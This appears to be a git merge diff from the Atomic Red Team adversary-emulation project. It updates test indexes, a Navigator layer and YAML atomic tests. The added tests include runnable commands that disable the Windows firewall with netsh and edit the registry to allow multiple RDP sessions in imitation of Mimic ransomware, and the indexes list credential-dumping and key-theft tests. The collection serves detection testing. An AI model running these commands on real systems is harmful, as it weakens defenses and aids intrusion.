Merge branch 'master' into T1048.003_http.server

2023-02-09 10:11:27 -06:00
parent 4ed469e217 9d9a7cc251
commit 42527f4bdf
41 changed files with 811582 additions and 17 deletions
@@ -0,0 +1,19 @@
+name: 'Close stale issues and PRs'
+on:
+  schedule:
+    - cron: '30 1 * * *'
+
+jobs:
+  stale:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/stale@v7
+        with:
+          stale-issue-message: 'This issue is stale because it has been open 30 days with no activity. Remove stale label or comment or this will be closed in 5 days.'
+          stale-pr-message: 'This PR is stale because it has been open 45 days with no activity. Remove stale label or comment or this will be closed in 10 days.'
+          close-issue-message: 'This issue was closed because it has been stalled for 5 days with no activity.'
+          close-pr-message: 'This PR was closed because it has been stalled for 10 days with no activity.'
+          days-before-issue-stale: 30
+          days-before-pr-stale: 45
+          days-before-issue-close: 5
+          days-before-pr-close: 10
@@ -1,7 +1,7 @@
 # <%= technique['identifier'] %> - <%= technique['name'] -%>

 ## [Description from ATT&CK](https://attack.mitre.org/techniques/<%= technique['identifier'].gsub(/\./, '/') %>)
-<blockquote><%= technique['description'] %></blockquote>
+<blockquote><%= technique['description'].gsub("%\\<", "%<") %></blockquote>

 ## Atomic Tests
 <% atomic_yaml['atomic_tests'].each_with_index do |test, test_number| -%>
@@ -29,6 +29,29 @@ class AtomicRedTeam
    end
  end

+  #
+  # Returns the individual Atomic Tests for a given identifer, passed as either a string (T1234) or an ATT&CK technique object
+  #
+  def atomic_tests_for_technique_by_platform(technique_or_technique_identifier, platform)
+    technique_identifier = if technique_or_technique_identifier.is_a? Hash
+      ATTACK_API.technique_identifier_for_technique technique_or_technique_identifier
+    else
+      technique_or_technique_identifier
+    end
+
+    test_list = Array.new
+    atomic_tests.find do |atomic_yaml| 
+      if atomic_yaml.fetch('attack_technique').upcase == technique_identifier.upcase
+        atomic_yaml['atomic_tests'].each do |a_test|
+          if a_test["supported_platforms"].include?(platform[:platform])
+              test_list.append(a_test)
+          end
+        end
+      end
+    end
+    test_list
+  end
+
  #
  # Returns the individual Atomic Tests for a given identifer, passed as either a string (T1234) or an ATT&CK technique object
  #
@@ -1 +1 @@
-{"name":"Atomic Red Team (Containers)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1053","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"comment":"\n- ListCronjobs\n- CreateCronjob\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.007","score":1,"enabled":true,"comment":"\n- ListSecrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"comment":"\n- ExecIntoContainer\n- Docker Exec Into Container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"comment":"\n- Deploy Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":2,"enabled":true,"comment":"\n- Deploy container using nsenter container escape\n- Mount host filesystem to escape privileged Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]}]}
+{"name":"Atomic Red Team (Containers)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1053","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"comment":"\n- ListCronjobs\n- CreateCronjob\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1552","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.007","score":2,"enabled":true,"comment":"\n- List All Secrets\n- ListSecrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"comment":"\n- ExecIntoContainer\n- Docker Exec Into Container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"comment":"\n- Deploy Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":2,"enabled":true,"comment":"\n- Deploy container using nsenter container escape\n- Mount host filesystem to escape privileged Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]}]}
@@ -1,5 +1,6 @@
 Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
-credential-access,T1552.007,Kubernetes List Secrets,1,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
+credential-access,T1552.007,Kubernetes List Secrets,1,List All Secrets,31e794c4-48fd-4a76-aca4-6587c155bc11,bash
+credential-access,T1552.007,Kubernetes List Secrets,2,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
 persistence,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
 persistence,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
 execution,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
@@ -176,6 +176,7 @@ defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,14,
 defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,15,Tail the UFW firewall log file,419cca0c-fa52-4572-b0d7-bc7c6f388a27,sh
 defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,16,LockBit Black - Unusual Windows firewall registry modification -cmd,a4651931-ebbb-4cde-9363-ddf3d66214cb,command_prompt
 defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,17,LockBit Black - Unusual Windows firewall registry modification -Powershell,80b453d1-eec5-4144-bf08-613a6c3ffe12,powershell
+defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,18,Blackbit - Disable Windows Firewall using netsh firewall,91f348e6-3760-4997-a93b-2ceee7f254ee,command_prompt
 defense-evasion,T1207,Rogue Domain Controller,1,DCShadow (Active Directory),0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6,powershell
 defense-evasion,T1610,Deploy a container,1,Deploy Docker container,59aa6f26-7620-417e-9318-589e0fb7a372,bash
 defense-evasion,T1112,Modify Registry,1,Modify Registry of Current User Profile - cmd,1324796b-d0f6-455a-b4ae-21ffee6aa6b9,command_prompt
@@ -222,6 +223,8 @@ defense-evasion,T1112,Modify Registry,41,Terminal Server Client Connection Histo
 defense-evasion,T1112,Modify Registry,42,Disable Windows Error Reporting Settings,d2c9e41e-cd86-473d-980d-b6403562e3e1,command_prompt
 defense-evasion,T1112,Modify Registry,43,DisallowRun Execution Of Certain Applications,71db768a-5a9c-4047-b5e7-59e01f188e84,command_prompt
 defense-evasion,T1112,Modify Registry,44,Enabling Restricted Admin Mode via Command_Prompt,fe7974e5-5813-477b-a7bd-311d4f535e83,command_prompt
+defense-evasion,T1112,Modify Registry,45,Mimic Ransomware - Enable Multiple User Sessions,39f1f378-ba8a-42b3-96dc-2a6540cfc1e3,command_prompt
+defense-evasion,T1112,Modify Registry,46,Mimic Ransomware - Allow Multiple RDP Sessions per User,35727d9e-7a7f-4d0c-a259-dc3906d6e8b9,command_prompt
 defense-evasion,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
 defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh
 defense-evasion,T1484.001,Domain Policy Modification: Group Policy Modification,1,LockBit Black - Modify Group policy settings -cmd,9ab80952-74ee-43da-a98c-1e740a985f28,command_prompt
@@ -710,6 +713,10 @@ execution,T1059.004,Command and Scripting Interpreter: Bash,2,Command-Line Inter
 execution,T1059.004,Command and Scripting Interpreter: Bash,3,Harvest SUID executable files,46274fc6-08a7-4956-861b-24cbbaa0503c,sh
 execution,T1059.004,Command and Scripting Interpreter: Bash,4,LinEnum tool execution,a2b35a63-9df1-4806-9a4d-5fe0500845f2,sh
 execution,T1059.004,Command and Scripting Interpreter: Bash,5,New script file in the tmp directory,8cd1947b-4a54-41fb-b5ea-07d0ace04f81,sh
+execution,T1059.004,Command and Scripting Interpreter: Bash,6,What shell is running,7b38e5cc-47be-44f0-a425-390305c76c17,sh
+execution,T1059.004,Command and Scripting Interpreter: Bash,7,What shells are available,bf23c7dc-1004-4949-8262-4c1d1ef87702,sh
+execution,T1059.004,Command and Scripting Interpreter: Bash,8,Command line scripts,b04ed73c-7d43-4dc8-b563-a2fc595cba1a,sh
+execution,T1059.004,Command and Scripting Interpreter: Bash,9,Obfuscated command line scripts,5bec4cc8-f41e-437b-b417-33ff60acf9af,sh
 execution,T1059.006,Command and Scripting Interpreter: Python,1,Execute shell script via python's command mode arguement,3a95cdb2-c6ea-4761-b24e-02b71889b8bb,sh
 execution,T1059.006,Command and Scripting Interpreter: Python,2,Execute Python via scripts (Linux),6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8,sh
 execution,T1059.006,Command and Scripting Interpreter: Python,3,Execute Python via Python executables (Linux),0b44d79b-570a-4b27-a31f-3bf2156e5eaa,sh
@@ -1062,6 +1069,9 @@ credential-access,T1552.004,Unsecured Credentials: Private Keys,4,Copy Private S
 credential-access,T1552.004,Unsecured Credentials: Private Keys,5,Copy the users GnuPG directory with rsync,2a5a0601-f5fb-4e2e-aa09-73282ae6afca,sh
 credential-access,T1552.004,Unsecured Credentials: Private Keys,6,ADFS token signing and encryption certificates theft - Local,78e95057-d429-4e66-8f82-0f060c1ac96f,powershell
 credential-access,T1552.004,Unsecured Credentials: Private Keys,7,ADFS token signing and encryption certificates theft - Remote,cab413d8-9e4a-4b8d-9b84-c985bd73a442,powershell
+credential-access,T1552.004,Unsecured Credentials: Private Keys,8,CertUtil ExportPFX,336b25bf-4514-4684-8924-474974f28137,powershell
+credential-access,T1552.004,Unsecured Credentials: Private Keys,9,Export Root Certificate with Export-PFXCertificate,7617f689-bbd8-44bc-adcd-6f8968897848,powershell
+credential-access,T1552.004,Unsecured Credentials: Private Keys,10,Export Root Certificate with Export-Certificate,78b274f8-acb0-428b-b1f7-7b0d0e73330a,powershell
 credential-access,T1557.001,Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay,1,LLMNR Poisoning with Inveigh (PowerShell),deecd55f-afe0-4a62-9fba-4d1ba2deb321,powershell
 credential-access,T1003.001,OS Credential Dumping: LSASS Memory,1,Dump LSASS.exe Memory using ProcDump,0be2230c-9ab3-4ac2-8826-3199b9a0ebf8,command_prompt
 credential-access,T1003.001,OS Credential Dumping: LSASS Memory,2,Dump LSASS.exe Memory using comsvcs.dll,2536dee2-12fb-459a-8c37-971844fa73be,powershell
@@ -1134,8 +1144,9 @@ credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,7,Win
 credential-access,T1003.006,OS Credential Dumping: DCSync,1,DCSync (Active Directory),129efd28-8497-4c87-a1b0-73b9a870ca3e,command_prompt
 credential-access,T1003.006,OS Credential Dumping: DCSync,2,Run DSInternals Get-ADReplAccount,a0bced08-3fc5-4d8b-93b7-e8344739376e,powershell
 credential-access,T1056.004,Input Capture: Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
-credential-access,T1552.007,Kubernetes List Secrets,1,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
-credential-access,T1552.007,Kubernetes List Secrets,2,Cat the contents of a Kubernetes service account token file,788e0019-a483-45da-bcfe-96353d46820f,sh
+credential-access,T1552.007,Kubernetes List Secrets,1,List All Secrets,31e794c4-48fd-4a76-aca4-6587c155bc11,bash
+credential-access,T1552.007,Kubernetes List Secrets,2,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
+credential-access,T1552.007,Kubernetes List Secrets,3,Cat the contents of a Kubernetes service account token file,788e0019-a483-45da-bcfe-96353d46820f,sh
 discovery,T1033,System Owner/User Discovery,1,System Owner/User Discovery,4c4959bf-addf-4b4a-be86-8d09cc1857aa,command_prompt
 discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh
 discovery,T1033,System Owner/User Discovery,3,Find computers where user has session - Stealth mode (PowerView),29857f27-a36f-4f7e-8084-4557cd6207ca,powershell
@@ -258,6 +258,10 @@ execution,T1059.004,Command and Scripting Interpreter: Bash,2,Command-Line Inter
 execution,T1059.004,Command and Scripting Interpreter: Bash,3,Harvest SUID executable files,46274fc6-08a7-4956-861b-24cbbaa0503c,sh
 execution,T1059.004,Command and Scripting Interpreter: Bash,4,LinEnum tool execution,a2b35a63-9df1-4806-9a4d-5fe0500845f2,sh
 execution,T1059.004,Command and Scripting Interpreter: Bash,5,New script file in the tmp directory,8cd1947b-4a54-41fb-b5ea-07d0ace04f81,sh
+execution,T1059.004,Command and Scripting Interpreter: Bash,6,What shell is running,7b38e5cc-47be-44f0-a425-390305c76c17,sh
+execution,T1059.004,Command and Scripting Interpreter: Bash,7,What shells are available,bf23c7dc-1004-4949-8262-4c1d1ef87702,sh
+execution,T1059.004,Command and Scripting Interpreter: Bash,8,Command line scripts,b04ed73c-7d43-4dc8-b563-a2fc595cba1a,sh
+execution,T1059.004,Command and Scripting Interpreter: Bash,9,Obfuscated command line scripts,5bec4cc8-f41e-437b-b417-33ff60acf9af,sh
 execution,T1059.006,Command and Scripting Interpreter: Python,1,Execute shell script via python's command mode arguement,3a95cdb2-c6ea-4761-b24e-02b71889b8bb,sh
 execution,T1059.006,Command and Scripting Interpreter: Python,2,Execute Python via scripts (Linux),6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8,sh
 execution,T1059.006,Command and Scripting Interpreter: Python,3,Execute Python via Python executables (Linux),0b44d79b-570a-4b27-a31f-3bf2156e5eaa,sh
@@ -122,6 +122,7 @@ defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,5,O
 defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,6,Allow Executable Through Firewall Located in Non-Standard Location,6f5822d2-d38d-4f48-9bfc-916607ff6b8c,powershell
 defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,16,LockBit Black - Unusual Windows firewall registry modification -cmd,a4651931-ebbb-4cde-9363-ddf3d66214cb,command_prompt
 defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,17,LockBit Black - Unusual Windows firewall registry modification -Powershell,80b453d1-eec5-4144-bf08-613a6c3ffe12,powershell
+defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,18,Blackbit - Disable Windows Firewall using netsh firewall,91f348e6-3760-4997-a93b-2ceee7f254ee,command_prompt
 defense-evasion,T1207,Rogue Domain Controller,1,DCShadow (Active Directory),0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6,powershell
 defense-evasion,T1112,Modify Registry,1,Modify Registry of Current User Profile - cmd,1324796b-d0f6-455a-b4ae-21ffee6aa6b9,command_prompt
 defense-evasion,T1112,Modify Registry,2,Modify Registry of Local Machine - cmd,282f929a-6bc5-42b8-bd93-960c3ba35afe,command_prompt
@@ -167,6 +168,8 @@ defense-evasion,T1112,Modify Registry,41,Terminal Server Client Connection Histo
 defense-evasion,T1112,Modify Registry,42,Disable Windows Error Reporting Settings,d2c9e41e-cd86-473d-980d-b6403562e3e1,command_prompt
 defense-evasion,T1112,Modify Registry,43,DisallowRun Execution Of Certain Applications,71db768a-5a9c-4047-b5e7-59e01f188e84,command_prompt
 defense-evasion,T1112,Modify Registry,44,Enabling Restricted Admin Mode via Command_Prompt,fe7974e5-5813-477b-a7bd-311d4f535e83,command_prompt
+defense-evasion,T1112,Modify Registry,45,Mimic Ransomware - Enable Multiple User Sessions,39f1f378-ba8a-42b3-96dc-2a6540cfc1e3,command_prompt
+defense-evasion,T1112,Modify Registry,46,Mimic Ransomware - Allow Multiple RDP Sessions per User,35727d9e-7a7f-4d0c-a259-dc3906d6e8b9,command_prompt
 defense-evasion,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
 defense-evasion,T1484.001,Domain Policy Modification: Group Policy Modification,1,LockBit Black - Modify Group policy settings -cmd,9ab80952-74ee-43da-a98c-1e740a985f28,command_prompt
 defense-evasion,T1484.001,Domain Policy Modification: Group Policy Modification,2,LockBit Black - Modify Group policy settings -Powershell,b51eae65-5441-4789-b8e8-64783c26c1d1,powershell
@@ -761,6 +764,9 @@ credential-access,T1555.003,Credentials from Password Stores: Credentials from W
 credential-access,T1552.004,Unsecured Credentials: Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-f8347f632696,command_prompt
 credential-access,T1552.004,Unsecured Credentials: Private Keys,6,ADFS token signing and encryption certificates theft - Local,78e95057-d429-4e66-8f82-0f060c1ac96f,powershell
 credential-access,T1552.004,Unsecured Credentials: Private Keys,7,ADFS token signing and encryption certificates theft - Remote,cab413d8-9e4a-4b8d-9b84-c985bd73a442,powershell
+credential-access,T1552.004,Unsecured Credentials: Private Keys,8,CertUtil ExportPFX,336b25bf-4514-4684-8924-474974f28137,powershell
+credential-access,T1552.004,Unsecured Credentials: Private Keys,9,Export Root Certificate with Export-PFXCertificate,7617f689-bbd8-44bc-adcd-6f8968897848,powershell
+credential-access,T1552.004,Unsecured Credentials: Private Keys,10,Export Root Certificate with Export-Certificate,78b274f8-acb0-428b-b1f7-7b0d0e73330a,powershell
 credential-access,T1557.001,Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay,1,LLMNR Poisoning with Inveigh (PowerShell),deecd55f-afe0-4a62-9fba-4d1ba2deb321,powershell
 credential-access,T1003.001,OS Credential Dumping: LSASS Memory,1,Dump LSASS.exe Memory using ProcDump,0be2230c-9ab3-4ac2-8826-3199b9a0ebf8,command_prompt
 credential-access,T1003.001,OS Credential Dumping: LSASS Memory,2,Dump LSASS.exe Memory using comsvcs.dll,2536dee2-12fb-459a-8c37-971844fa73be,powershell
@@ -13,7 +13,8 @@
 - T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1110.004 Brute Force: Credential Stuffing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1552.007 Kubernetes List Secrets](../../T1552.007/T1552.007.md)
-  - Atomic Test #1: ListSecrets [containers]
+  - Atomic Test #1: List All Secrets [containers]
+  - Atomic Test #2: ListSecrets [containers]

 # persistence
 - T1133 External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -244,6 +244,7 @@
  - Atomic Test #15: Tail the UFW firewall log file [linux]
  - Atomic Test #16: LockBit Black - Unusual Windows firewall registry modification -cmd [windows]
  - Atomic Test #17: LockBit Black - Unusual Windows firewall registry modification -Powershell [windows]
+  - Atomic Test #18: Blackbit - Disable Windows Firewall using netsh firewall [windows]
 - T1152 Launchctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1553.003 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1207 Rogue Domain Controller](../../T1207/T1207.md)
@@ -297,6 +298,8 @@
  - Atomic Test #42: Disable Windows Error Reporting Settings [windows]
  - Atomic Test #43: DisallowRun Execution Of Certain Applications [windows]
  - Atomic Test #44: Enabling Restricted Admin Mode via Command_Prompt [windows]
+  - Atomic Test #45: Mimic Ransomware - Enable Multiple User Sessions [windows]
+  - Atomic Test #46: Mimic Ransomware - Allow Multiple RDP Sessions per User [windows]
 - [T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md)
  - Atomic Test #1: powerShell Persistence via hijacking default modules - Get-Variable.exe [windows]
 - T1535 Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1094,6 +1097,10 @@
  - Atomic Test #3: Harvest SUID executable files [linux]
  - Atomic Test #4: LinEnum tool execution [linux]
  - Atomic Test #5: New script file in the tmp directory [linux]
+  - Atomic Test #6: What shell is running [linux]
+  - Atomic Test #7: What shells are available [linux]
+  - Atomic Test #8: Command line scripts [linux]
+  - Atomic Test #9: Obfuscated command line scripts [linux]
 - T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1204.003 Malicious Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1154 Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1736,6 +1743,9 @@
  - Atomic Test #5: Copy the users GnuPG directory with rsync [macos, linux]
  - Atomic Test #6: ADFS token signing and encryption certificates theft - Local [windows]
  - Atomic Test #7: ADFS token signing and encryption certificates theft - Remote [windows]
+  - Atomic Test #8: CertUtil ExportPFX [windows]
+  - Atomic Test #9: Export Root Certificate with Export-PFXCertificate [windows]
+  - Atomic Test #10: Export Root Certificate with Export-Certificate [windows]
 - [T1557.001 Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md)
  - Atomic Test #1: LLMNR Poisoning with Inveigh (PowerShell) [windows]
 - [T1003.001 OS Credential Dumping: LSASS Memory](../../T1003.001/T1003.001.md)
@@ -1846,8 +1856,9 @@
 - [T1056.004 Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md)
  - Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
 - [T1552.007 Kubernetes List Secrets](../../T1552.007/T1552.007.md)
-  - Atomic Test #1: ListSecrets [containers]
-  - Atomic Test #2: Cat the contents of a Kubernetes service account token file [linux]
+  - Atomic Test #1: List All Secrets [containers]
+  - Atomic Test #2: ListSecrets [containers]
+  - Atomic Test #3: Cat the contents of a Kubernetes service account token file [linux]
 - T1556.004 Network Device Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

 # discovery
@@ -642,6 +642,10 @@
  - Atomic Test #3: Harvest SUID executable files [linux]
  - Atomic Test #4: LinEnum tool execution [linux]
  - Atomic Test #5: New script file in the tmp directory [linux]
+  - Atomic Test #6: What shell is running [linux]
+  - Atomic Test #7: What shells are available [linux]
+  - Atomic Test #8: Command line scripts [linux]
+  - Atomic Test #9: Obfuscated command line scripts [linux]
 - T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1154 Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -175,6 +175,7 @@
  - Atomic Test #6: Allow Executable Through Firewall Located in Non-Standard Location [windows]
  - Atomic Test #16: LockBit Black - Unusual Windows firewall registry modification -cmd [windows]
  - Atomic Test #17: LockBit Black - Unusual Windows firewall registry modification -Powershell [windows]
+  - Atomic Test #18: Blackbit - Disable Windows Firewall using netsh firewall [windows]
 - T1553.003 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1207 Rogue Domain Controller](../../T1207/T1207.md)
  - Atomic Test #1: DCShadow (Active Directory) [windows]
@@ -225,6 +226,8 @@
  - Atomic Test #42: Disable Windows Error Reporting Settings [windows]
  - Atomic Test #43: DisallowRun Execution Of Certain Applications [windows]
  - Atomic Test #44: Enabling Restricted Admin Mode via Command_Prompt [windows]
+  - Atomic Test #45: Mimic Ransomware - Enable Multiple User Sessions [windows]
+  - Atomic Test #46: Mimic Ransomware - Allow Multiple RDP Sessions per User [windows]
 - [T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md)
  - Atomic Test #1: powerShell Persistence via hijacking default modules - Get-Variable.exe [windows]
 - T1027.001 Obfuscated Files or Information: Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1258,6 +1261,9 @@
  - Atomic Test #1: Private Keys [windows]
  - Atomic Test #6: ADFS token signing and encryption certificates theft - Local [windows]
  - Atomic Test #7: ADFS token signing and encryption certificates theft - Remote [windows]
+  - Atomic Test #8: CertUtil ExportPFX [windows]
+  - Atomic Test #9: Export Root Certificate with Export-PFXCertificate [windows]
+  - Atomic Test #10: Export Root Certificate with Export-Certificate [windows]
 - [T1557.001 Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md)
  - Atomic Test #1: LLMNR Poisoning with Inveigh (PowerShell) [windows]
 - [T1003.001 OS Credential Dumping: LSASS Memory](../../T1003.001/T1003.001.md)
@@ -9581,6 +9581,21 @@ defense-evasion:
          Remove-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" -Name EnableFirewall -Force -ErrorAction Ignore
        name: powershell
        elevation_required: true
+    - name: Blackbit - Disable Windows Firewall using netsh firewall
+      auto_generated_guid: 91f348e6-3760-4997-a93b-2ceee7f254ee
+      description: "An adversary tries to modify the windows firewall configuration
+        using the deprecated netsh firewall command (command still works).     \n"
+      supported_platforms:
+      - windows
+      executor:
+        command: 'netsh firewall set opmode mode=disable
+
+          '
+        cleanup_command: 'netsh firewall set opmode mode=enable >nul 2>&1
+
+          '
+        name: command_prompt
+        elevation_required: true
  T1152:
    technique:
      x_mitre_platforms:
@@ -11101,6 +11116,42 @@ defense-evasion:
          '
        name: command_prompt
        elevation_required: true
+    - name: Mimic Ransomware - Enable Multiple User Sessions
+      auto_generated_guid: 39f1f378-ba8a-42b3-96dc-2a6540cfc1e3
+      description: "This test emulates Mimic ransomware's ability to enable multiple
+        user sessions by modifying the AllowMultipleTSSessions value within the Winlogon
+        registry key. \nSee [Mimic Ransomware Overview] (https://www.trendmicro.com/en_us/research/23/a/new-mimic-ransomware-abuses-everything-apis-for-its-encryption-p.html)\n"
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Winlogon
+          /t REG_DWORD /v AllowMultipleTSSessions /d 1 /f
+
+          '
+        cleanup_command: 'reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Winlogon
+          /v AllowMultipleTSSessions /f >nul 2>&1
+
+          '
+        name: command_prompt
+        elevation_required: true
+    - name: Mimic Ransomware - Allow Multiple RDP Sessions per User
+      auto_generated_guid: 35727d9e-7a7f-4d0c-a259-dc3906d6e8b9
+      description: "This test emulates Mimic ransomware's ability to enable multiple
+        RDP sessions per user by modifying the fSingleSessionPerUser value within
+        the Terminal Server registry key. \nSee [Mimic Ransomware Overview] (https://www.trendmicro.com/en_us/research/23/a/new-mimic-ransomware-abuses-everything-apis-for-its-encryption-p.html)\n"
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKLM\System\CurrentControlSet\Control\Terminal Server"
+          /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
+
+          '
+        cleanup_command: 'reg delete "HKLM\System\CurrentControlSet\Control\Terminal
+          Server" /v fSingleSessionPerUser /f >nul 2>&1
+
+          '
+        name: command_prompt
+        elevation_required: true
  T1574.008:
    technique:
      x_mitre_platforms:
@@ -47296,6 +47347,68 @@ execution:
        cleanup_command: |
          rm $TMPFILE
          unset TMPFILE
+    - name: What shell is running
+      auto_generated_guid: 7b38e5cc-47be-44f0-a425-390305c76c17
+      description: 'An adversary will want to discover what shell is running so that
+        they can tailor their attacks accordingly. The following commands will discover
+        what shell is running.
+
+        '
+      supported_platforms:
+      - linux
+      executor:
+        name: sh
